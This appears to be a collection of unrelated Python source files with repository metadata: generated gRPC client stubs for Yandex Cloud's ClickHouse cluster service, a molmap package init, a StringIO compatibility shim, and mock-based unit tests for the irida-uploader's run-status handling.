yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Restore(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Restore',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RescheduleMaintenance(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/RescheduleMaintenance',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListLogs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListLogs',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StreamLogs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/StreamLogs',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamLogRecord.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOperations(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListOperations',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListBackups(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListBackups',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListHosts',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AddHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddHosts',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateHosts',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteHosts',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetShard(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/GetShard',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Shard.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListShards(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListShards',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AddShard(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddShard',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterShardRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateShard(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateShard',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteShard(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteShard',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetShardGroup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/GetShardGroup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardGroupRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.ShardGroup.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListShardGroups(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListShardGroups',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateShardGroup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/CreateShardGroup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterShardGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateShardGroup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateShardGroup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteShardGroup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteShardGroup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateExternalDictionary(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/CreateExternalDictionary',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterExternalDictionaryRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteExternalDictionary(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteExternalDictionary',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterExternalDictionaryRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
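# --- Illustrative one-shot call (a sketch, not generated code) ---
# Minimal example of the experimental API above: each static method takes the
# request plus a target, so the caller does not have to build a stub object.
# The target and the cluster_id field are hypothetical placeholders.
def _example_get_cluster(cluster_id):
    """Sketch: fetch one Cluster message via the experimental Get helper."""
    request = yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterRequest(
        cluster_id=cluster_id)
    return ClusterService.Get(request, target='localhost:50051', insecure=True)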
b1785fa6bfb825e7eb1d6baba2051bb7cbdc3644 | 152 | py | Python | molmap/model/__init__.py | SuperXiang/bidd-molmap | f0f5da299e4da4ebae83eed81ddfdad31c707d92 | ["MIT"] | 1 star (2021-04-01T05:06:16.000Z) | no issue/fork events recorded
from molmap.model import cbks, loss, net, importance
from .model import RegressionEstimator
from .model import MultiClassEstimator, MultiLabelEstimator
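# Re-export shim: downstream code can write
#     from molmap.model import RegressionEstimator
# without depending on the package's internal module layout.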
b19155ff9890aba373abd9ff9f2292f79aa56674 | 133 | py | Python | hvad/compat/string_io.py | aptivate/django-hvad | 61457412eeae09b5df1c514a5b162230be125e1b | ["BSD-3-Clause"] | no star/issue/fork events recorded
# -*- coding: utf-8 -*-
try:
from io import StringIO # python 3
except ImportError:
from StringIO import StringIO # python 2
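# Usage sketch (an addition, not part of the original module): both imports
# expose the same text-buffer behaviour, so callers stay version-agnostic.
def _example_roundtrip():
    """Sketch: the compat StringIO reads back exactly what it was given."""
    buf = StringIO(u"hello")
    return buf.read()  # -> u"hello"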
b19587429ba0c46a1a27dd721649ab8f9c6f73b4 | 25,258 | py | Python | iridauploader/tests/core/test_upload.py | COMBAT-SARS-COV-2/irida-uploader | b9d04d187d6a5a9fdcaef5b27135965ffac99db0 | ["Apache-2.0"] | 7 stars (2019-01-25 to 2021-01-12) | 80 issues (2019-01-29 to 2022-03-25) | 9 forks (2019-03-14 to 2022-01-06)
import unittest
from unittest.mock import patch, call
from os import path
import os
from iridauploader.api import MODE_DEFAULT
from iridauploader.core import upload, logger, exit_return
from iridauploader.config import config
from iridauploader.model import DirectoryStatus
path_to_module = path.abspath(path.dirname(__file__))
if len(path_to_module) == 0:
path_to_module = '.'
class TestUploadRunSingleEntry(unittest.TestCase):
"""
Tests the core.upload.upload_run_single_entry function
"""
# Reusable stubs
class StubValidationResult:
_valid = True
_error_count = 0
_error_list = []
def is_valid(self):
return self._valid
def error_count(self):
return self._error_count
@property
def error_list(self):
return self._error_list
class StubDirectoryStatus:
directory = path.join(path_to_module, "fake_ngs_data")
_status = DirectoryStatus.NEW
_message = ""
def status_equals(self, status):
return status == self._status
@property
def message(self):
return self._message
@property
def status(self):
return self._status
#
# @status.setter
# def status(self, status):
# self._status = status
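# StubDirectoryStatus stands in for model.DirectoryStatus: the tests set
# _status directly instead of going through the commented-out setter.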
def setUp(self):
print("\nStarting " + self.__module__ + ": " + self._testMethodName)
# config.setup()
config._init_config_parser()
def tearDown(self):
print("Cleaning up status file")
log_file_path = path.join(path_to_module, "fake_ngs_data", "irida-uploader.log")
if path.exists(log_file_path):
os.remove(log_file_path)
status_file_path = path.join(path_to_module, "fake_ngs_data", "irida_uploader_status.info")
if path.exists(status_file_path):
os.remove(status_file_path)
# Clean up the logger in the case where a test fails to complete
print("Cleaning up directory logger")
if logger.directory_logger:
logger.remove_directory_logger()
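# Every test below follows the same pattern: patch the collaborators of
# upload.upload_run_single_entry, pin a DirectoryStatus on the stub, invoke
# the entry point, then assert on the result and on whether
# _validate_and_upload was reached.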
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_invalid_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits when directory status is invalid
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.INVALID
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_completed_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits when directory status is complete
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.COMPLETE
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_error_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits when directory status is error
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.ERROR
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_partial_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits when directory status is partial
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.PARTIAL
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_completed_force_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with force when directory status is complete
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.COMPLETE
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory, force_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_partial_force_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with force when directory status is partial
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.PARTIAL
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory, force_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_partial_continue_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with continue_upload when directory status is partial
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.PARTIAL
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(
stub_directory_status.directory, force_upload=False, continue_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", True)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_error_force_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with force when directory status is error
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.ERROR
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory, force_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_delayed_force_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with force when directory status is delayed
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.DELAYED
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory, force_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_new_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues when directory status is new
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.NEW
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.progress.upload_status._set_run_delayed")
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_new_with_delay_config_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers,
mock_set_run_delayed):
"""
Checks that function exits with success when directory status is new and there is a delay set
:return:
"""
# set a delay
config.set_config_options(delay=1)
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.NEW
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_set_run_delayed.side_effect = [None]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_SUCCESS)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
mock_set_run_delayed.assert_called_with(stub_directory_status)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
# @patch("iridauploader.progress.upload_status._delayed_time_has_passed")
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_delay_time_has_passed_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits with success when directory status is delayed and the delay has passed
:return:
"""
# set a delay for 0 as time has passed
config.set_config_options(delay=0)
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.DELAYED
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.progress.upload_status._delayed_time_has_passed")
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_delay_not_passed_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers,
mock_delayed_time_has_passed):
"""
Checks that function exits with success when directory status is delayed and there is still delay time
:return:
"""
# set a delay
config.set_config_options(delay=1)
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.DELAYED
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_delayed_time_has_passed.side_effect = [False]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_SUCCESS)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
mock_delayed_time_has_passed.assert_called_with(stub_directory_status, 1)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_directory_not_writable_no_readonly_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits with an error when the run directory has a read-only conflict
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.DELAYED
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [True]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
